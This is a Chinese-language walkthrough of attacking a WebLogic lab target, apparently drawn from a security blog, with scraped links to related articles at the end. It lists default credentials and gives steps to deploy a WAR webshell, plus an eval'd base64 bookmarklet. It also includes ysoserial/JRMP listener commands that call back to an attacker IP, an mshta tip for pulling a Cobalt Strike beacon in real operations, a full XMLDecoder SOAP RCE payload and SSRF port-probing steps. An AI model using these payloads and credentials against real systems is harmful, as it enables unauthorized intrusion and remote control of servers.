靶机说明

目标ip:172.16.53.28(window 2003)

本靶机所针对的序列化漏洞系列以及常见安全问题如下:

  1. 弱口令登陆控制台部署war包webshell
  2. CVE-2018-2893
  3. CVE-2018-2628
  4. CVE-2017-10271
  5. CVE-2017-3248
  6. CVE-2016-3510
  7. CVE-2015-4852
  8. weblogic ssrf

信息探测

1. nmap探测目标服务器端口以及服务等相关信息

1.1 在命令行终端下执行以下命令

  1. namp -T4 -A 172.16.53.28

1.2 执行结果所获得的信息如下

通过nmap的探测结果,我们可以得知目标的7001端口开放了weblogic的相关服务,并且得知了weblogic的版本信息,以及其它系统相关信息和其它端口服务相关的信息。

得知了weblogic的版本等相关信息后,可以利用互联网检索是否该版本存在响应的漏洞,以寻求利用的可能

弱口令登陆控制台部署war包webshell

1. 登陆界面手工输入常用弱口令尝试登陆

1.1 由于weblogic的登陆入口有账户锁定的机制,所以无法采用爆破的方式,以下截图就是使用burpsuite爆破过后,导致输入正确的账号密码都被锁定

服务器终端也打印出账户被锁定30分钟的信息,如下:

1.2 手动输入常用的weblogic的肉口令进行登陆尝试

  1. #常用弱口令如下,可根据实际情况进行添加或者组合:
  2. administrator:password
  3. weblogic:password
  4. weblogic:weblogic
  5. weblogic:weblogic1
  6. weblogic:welcome1
  7. weblogic:admin123
  8. weblogic:Oracle@123
  9. system:weblogic
  10. system:password
  11. system:security
  12. system:system
  13. portaladmin:portaladmin
  14. wlcsystem:wlcsystem
  15. wlpisystem:wlpisystem
  16. admin:security
  17. joe:password
  18. guest:guest

2.登陆成功后,开始部署war包webshell

2.1 进入到weblogic的控制台首页,点击“锁定并编辑”,再点击“部署”


2.2 选择“安装“,如下截图


2.3 点击页面超链接”上载文件“,然后选中提前准备好的war包webshell,选择第一项‘将部署上载到管理服务器’,最后点击下一步

选中提前准备好的war包webshell(下载地址:https://github.com/SecurityRiskAdvisors/cmd.jsp),然后点击下一步

看到以下提示,说明上传成功,显示了我们上传的文件的所在位置,接着继续点击下一步

2.4 选择“将此部署安装为应用程序”,点击“下一步”

2.5 接下来可以给该部署命名,默认即可

2.6 点击“完成”之后,看到“设置更新成功”,说明前面的操作正确

2.7 再次回到'部署'选项中,选中刚刚部署的 cmd 应用程序,点击'启动'服务(注意,此处一定要来自己手工启动服务,不然 shell 是部署不上的 )

选择“是”

2.8 看到如下图所标记的内容,就说明webshell部署成功

2.9 启动部署成功之后,通过用浏览器访问 http://172.16.53.28:7001/cmd/cmd.jsp 就可以看到我们的 shell 了

备注 : 如果使用文章中提到的cmd.war来部署这个webshell,当访问该cmd.jsp文件的时候,会看到的是一个没有任何回显的空白页面,需要将一段js代码保存为浏览器的书签,当直接访问 http://172.16.53.28:7001/cmd/cmd.jsp的时候,再在当前页面点击js书签,才能看到页面的输出,如下图

  1. //需要保存为书签的js代码如下:
  2. javascript:{window.localStorage.embed=window.atob("ZG9jdW1lbnQud3JpdGUoIjxwPiIpOw0KdmFyIGh0bWwgPSAiPGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPSdjbWQuanNwJz5cDQo8aW5wdXQgbmFtZT0nYycgdHlwZT10ZXh0PjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUnVuJz5cDQo8L2Zvcm0+PGhyPlwNCjxmb3JtIGFjdGlvbj0nY21kLmpzcCcgbWV0aG9kPXBvc3Q+XA0KVXBsb2FkIGRpcjogPGlucHV0IG5hbWU9J2EnIHR5cGU9dGV4dCB2YWx1ZT0nLic+PGJyPlwNClNlbGVjdCBhIGZpbGUgdG8gdXBsb2FkOiA8aW5wdXQgbmFtZT0nbicgdHlwZT0nZmlsZScgaWQ9J2YnPlwNCjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2InIGlkPSdiJz5cDQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJz5cDQo8L2Zvcm0+PGhyPiI7DQp2YXIgZGl2ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZGl2Jyk7DQpkaXYuaW5uZXJIVE1MID0gaHRtbDsNCmRvY3VtZW50LmJvZHkuaW5zZXJ0QmVmb3JlKGRpdiwgZG9jdW1lbnQuYm9keS5maXJzdENoaWxkKTsNCg0KdmFyIGhhbmRsZUZpbGVTZWxlY3QgPSBmdW5jdGlvbihldnQpIHsNCiAgICB2YXIgZmlsZXMgPSBldnQudGFyZ2V0LmZpbGVzOw0KICAgIHZhciBmaWxlID0gZmlsZXNbMF07DQoNCiAgICBpZiAoZmlsZXMgJiYgZmlsZSkgew0KICAgICAgICB2YXIgcmVhZGVyID0gbmV3IEZpbGVSZWFkZXIoKTsNCg0KICAgICAgICByZWFkZXIub25sb2FkID0gZnVuY3Rpb24ocmVhZGVyRXZ0KSB7DQogICAgICAgICAgICB2YXIgYmluYXJ5U3RyaW5nID0gcmVhZGVyRXZ0LnRhcmdldC5yZXN1bHQ7DQogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYicpLnZhbHVlID0gYnRvYShiaW5hcnlTdHJpbmcpOw0KICAgICAgICB9Ow0KDQogICAgICAgIHJlYWRlci5yZWFkQXNCaW5hcnlTdHJpbmcoZmlsZSk7DQogICAgfQ0KfTsNCmlmICh3aW5kb3cuRmlsZSAmJiB3aW5kb3cuRmlsZVJlYWRlciAmJiB3aW5kb3cuRmlsZUxpc3QgJiYgd2luZG93LkJsb2IpIHsNCiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZicpLmFkZEV2ZW50TGlzdGVuZXIoJ2NoYW5nZScsIGhhbmRsZUZpbGVTZWxlY3QsIGZhbHNlKTsNCn0gZWxzZSB7DQogICAgYWxlcnQoJ1RoZSBGaWxlIEFQSXMgYXJlIG5vdCBmdWxseSBzdXBwb3J0ZWQgaW4gdGhpcyBicm93c2VyLicpOw0KfQ==");eval(window.localStorage.embed);};void(0);

至此,通过弱口令登陆weblogic并部署war包webshell就到此结束

CVE-2018-2893 漏洞利用

漏洞简介

WebLogic (CVE-2018-2893)漏洞和之前的JRMP协议漏洞(CVE-2018-2628)漏洞是分不开的,他是结合了RMI机制缺陷和JDK反序列化漏洞绕过了WebLogic黑名单,从而执行系统命令 。

受影响的系统版本

  • WebLogic10.3.6.0
  • WebLogic12.1.3.0
  • WebLogic12.2.1.2
  • WebLogic12.2.1.3

注:此漏洞暂时有一定利用限制,只在 jdk7u21 之前的版本实际利用成功过

相关利用工具下载地址

  1. https://github.com/pyn3rd/CVE-2018-2893

漏洞利用过程

1.通过CVE-2018-2893的相关检测脚本简单验证目标是否存在此漏洞

1.1 脚本下载地址

  1. https://github.com/anbai-inc/CVE-2018-2893

1.2 执行结果,显示存在CVE-2018-2893漏洞

2.生成 payload,功能是回连下载执行指定的系统命令(在大佬平台的环境下,以下命令所用到的ip需要是一个公网ip,比如自己的VPS)

  1. # 生成payload的命令如下,执行结果就是在当前目录下生成一个shell.ser的文件:
  2. java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "192.168.74.142:1099" > shell.ser

3.在攻击机上执行以下命令,启动服务端,等待目标weblogic下载执行指定的命令

  1. # 监听攻击机的1099端口
  2. java -cp ysoserial-cve-2018-2893.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "calc.exe"

4.通过T3协议将之前制作好的payload发送给目标weblogic,执行payload(命令中的ip为目标ip)

  1. python weblogic.py 192.168.74.143 7001 shell.cer

5.远程命令执行效果如下

注:此次漏洞利用过程执行的是打开计算机的命令,在实际操作过程当中,可以利用cs服务器生成hta文件,然后通过将“calc.exe”命令换成“mshta.exe http://攻击者服务器/options.hta” ,可以直接反弹beacon到cs服务器

CVE-2018-2628 漏洞利用

漏洞简介

由于 weblogic 对于 T3 协议发送的数据包没有过滤,注册一个 RMI 接口,通过 T3 协议建立连接,加载回来再一步步解包,利用 readObject 解析,从而造成了反序列化远程代码执行

受影响的系统版本

  • Weblogic 10.3.6.0
  • Weblogic 12.1.3.0
  • Weblogic 12.2.1.2
  • Weblogic 12.2.1.3

相关利用工具下载地址

  1. #漏洞检测脚本:
  2. https://github.com/aedoo/CVE-2018-2628-MultiThreading
  3. #k8 Tools:
  4. https://github.com/0xMJ/CVE-2018-2628/raw/master/k8weblogicGUI.exe
  5. #shell执行脚本:
  6. https://github.com/jas502n/CVE-2018-2628/blob/master/cve-2018-2628.py
  7. https://github.com/brianwrf/ysoserial

漏洞利用过程

1.通过CVE-2018-2628的相关检测脚本简单验证目标是否存在此漏洞

2.利用K8 Tools getshell

3.运行连接shell的python脚本(python2环境下运行),获取执行命令的控制台

Shell: http://192.168.74.143:7001/bea_wls_internal/wlscmd.jsp

CVE-2017-10271 漏洞利用

漏洞简介

WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,究其底层其实还是 XMLDecoder 的反序列化漏洞 。

受影响的系统版本

  • Weblogic 10.3.6.0.0
  • Weblogic 12.1.3.0.0
  • Weblogic 12.2.1.1.0
  • Weblogic 12.2.1.2.0

漏洞利用过程

1.验证目标机器是否存在此漏洞,验证方法如下:

浏览器访问 poc url : /wls-wsat/CoordinatorPortType 看到类似下面的返回则说明目标机器可能存在此漏洞

http://192.168.74.143:7001/wls-wsat/CoordinatorPortType

2.使用burpsuite的repeater模块像目标服务器发包,直接将payload复制到repeater的request位置

payload如下:

  1. POST /wls-wsat/CoordinatorPortType HTTP/1.1
  2. Host: 192.168.74.143
  3. Accept-Encoding: identity
  4. Content-Length: 592
  5. Accept-Language: zh-CN,zh;q=0.8
  6. Accept: */*
  7. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
  8. Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  9. Connection: keep-alive
  10. Cache-Control: max-age=0
  11. Content-Type: text/xml
  12. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  13. <soapenv:Header>
  14. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  15. <java version="1.8.0_131" class="java.beans.XMLDecoder">
  16. <void class="java.lang.ProcessBuilder">
  17. <array class="java.lang.String" length="3">
  18. <void index="0">
  19. <string>cmd.exe</string>
  20. </void>
  21. <void index="1">
  22. <string>/c</string>
  23. </void>
  24. <void index="2">
  25. <string>calc.exe</string>
  26. </void>
  27. </array>
  28. <void method="start"/></void>
  29. </java>
  30. </work:WorkContext>
  31. </soapenv:Header>
  32. <soapenv:Body/>
  33. </soapenv:Envelope>

2.1 需要对payload做以下一些修改

2.2 点击“Go”过后,目标服务器执行命令弹出计算机

weblogic ssrf 漏洞利用

漏洞简介

SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端。攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服务器作为代理进行端口扫描,甚至访问系统中的数据。

Oracle WebLogic web server即可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口。

漏洞利用过程

1.Weblogic ssrf url 如下:

  1. #SSRF漏洞存在于:
  2. http://192.168.74.143:7001/uddiexplorer/SearchPublicRegistries.jsp

2.向服务器通过get方式提交以下参数

  1. http://192.168.74.143:7001//uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=& txtSearchfor=&selfor=Business+location&btnSubmit=Search

此时提交参数operator=http://localhost/robots.txt ,访问的端口是80(不存在),访问一个不存在的端口会返回以下信息:

3、将访问的参数加上7001端口再访问

  1. http://192.168.74.143:7001//uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:7001/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=& txtSearchfor=&selfor=Business+location&btnSubmit=Search

此时服务器访问7001端口时返回一个404的状态码

还可能遇到的返回状态有以下几种:

3.内网端口探测

我们可以根据返回的不同状态信息,来判断内网的IP是否存在以及对应端口是否开放。这里有一个地方需要注意的是,需要知道目标内网网段。如果盲目的去进行网段扫描会耗费大量的时间。

根据不同的返回状态这个特性,利用python写一个脚本去探测

更多的利用可参考:https://blog.chaitin.cn/gopher-attack-surfaces/,如得知内网存在如redis的机器,也可通过此ssrf进行攻击

相关脚本下载地址:

https://github.com/anbai-inc/CVE-2018-2893

https://github.com/SecurityRiskAdvisors/cmd.jsp

https://github.com/0xMJ/CVE-2018-2628

https://github.com/brianwrf/ysoserial

https://github.com/Lighird/CVE-2018-2628

https://github.com/quentinhardy/scriptsAndExploits/tree/master/exploits/weblogic

https://github.com/jas502n/CVE-2018-2628

WebLogic远程命令执行的更多相关文章

  1. WebLogic “Java 反序列化”过程远程命令执行

    WebLogic “Java 反序列化”过程远程命令执行 详细信息: https://www.seebug.org/vuldb/ssvid-89726 说明: 反序列化是指特定语言中将传递的对象序列化 ...

  2. Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现

    一.     漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为 ...

  3. "Java 反序列化"过程远程命令执行漏洞

    一.漏洞描述   国外 FoxGlove 安全研究团队于2015年11月06日在其博客上公开了一篇关于常见 Java 应用如何利用反序列化操作进行远程命令执行的文章.原博文所提到的 Java 应用都使 ...

  4. FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  5. struts2远程命令执行漏洞S2-045

    Apache Struts2最新漏洞(CVE-2017-5638,S02-45) struts2远程命令执行漏洞S2-045 Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-04 ...

  6. SSD报告 - QRadar远程命令执行

    SSD报告 - QRadar远程命令执行 漏洞摘要 QRadar中的多个漏洞允许远程未经身份验证的攻击者使产品执行任意命令.每个漏洞本身并不像链接那么强大 - 这允许用户从未经身份验证的访问更改为经过 ...

  7. python套接字编程实现ntp服务和远程命令执行

    python套接字编程实现ntp服务和远程命令执行 目录 基于udp实现ntp服务 基于tcp实现远程命令执行 基于udp实现远程命令执行 tcp与udp的比较 前面关于套接字基础请查阅 https: ...

  8. 【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞

    2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确 ...

  9. URI Scheme注册伪协议实现远程命令执行

    Windows配置注册表注册伪协议 1.新建伪协议项 WIN+R 输入regedit 打开注册表,在注册表HKEY_CLASSES_ROOT键中新建一个项,项的名字就是你伪协议的名字,例如我注册一个c ...

随机推荐

  1. Base64编码和解码实现

    function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqr ...

  2. zookeeper应用 - 配置服务

    一端不停的更新配置,另一端监听这个配置的变化.     需要注意的是:监听端不一定读取到所有的变化.在zk服务器发送通知到客户端,客户端读取数据注册监听之间可能发生了多次数据变化,这些数据变化是得不到 ...

  3. 动态修改JDBC数据源配置

    因项目需要能动态修改数据源的配置,及修改后不用重启整个应用.使用的数据源是apache的BasicDataSource,网上千篇一律的是如下实现: BasicDataSource bds=getDat ...

  4. Java 性能调优指南之 Java 集合概览

    [编者按]本文作者为拥有十年金融软件开发经验的 Mikhail Vorontsov,文章主要概览了所有标准 Java 集合类型.文章系国内 ITOM 管理平台 OneAPM 编译呈现,以下为正文: 本 ...

  5. HDFS pipeline写 -- 客户端

    上一篇说了datanode端如何处理pipeline写请求的,这里主要看DFSClient. 这里以append为例, write差不多. 创建一个pipeline用于append操作的流程: Fil ...

  6. C++ 类 、构造、 析构、 重载 、单例模式 学习笔记及练习

    一.拷贝构造函数 1.是一种特殊的构造函数,就是用一个已有的对象去构造其同类的副本对象,即对象克隆. class 类名 { 类名(类名& that) { 对类成员挨个赋值 ... } } 练习 ...

  7. November 29th 2016 Week 49th Tuesday

    It is not easy to meet each other in such a big world. 世界这么大,能遇见,不容易. To meet each other, to make ne ...

  8. 获取索引--------用range()和len()

    a = ['Google', 'Baidu', 'Runoob', 'Taobao', 'QQ'] for i in range(len(a)): print(i+1,a[i])

  9. 我在德国做SAP CRM One Order redesign工作的心得

    时间过得很快,今天是我到德国工作的第四周,刚好一个月.Prototype的框架已经搭起来了,现在Order能够在新的框架下正常读写,能跑一些简单的scenario,这些scenario对于end us ...

  10. mysql分页(ajax)

    分页有多种方式,mysql的limit是个不错的选择,通过ajax实现异步刷新,将当前页数和每页数量传入后台即可 1. 首先后台要拿到总记录数和所需显示数据列表,所以要分别写两个sql方法 我这里是通 ...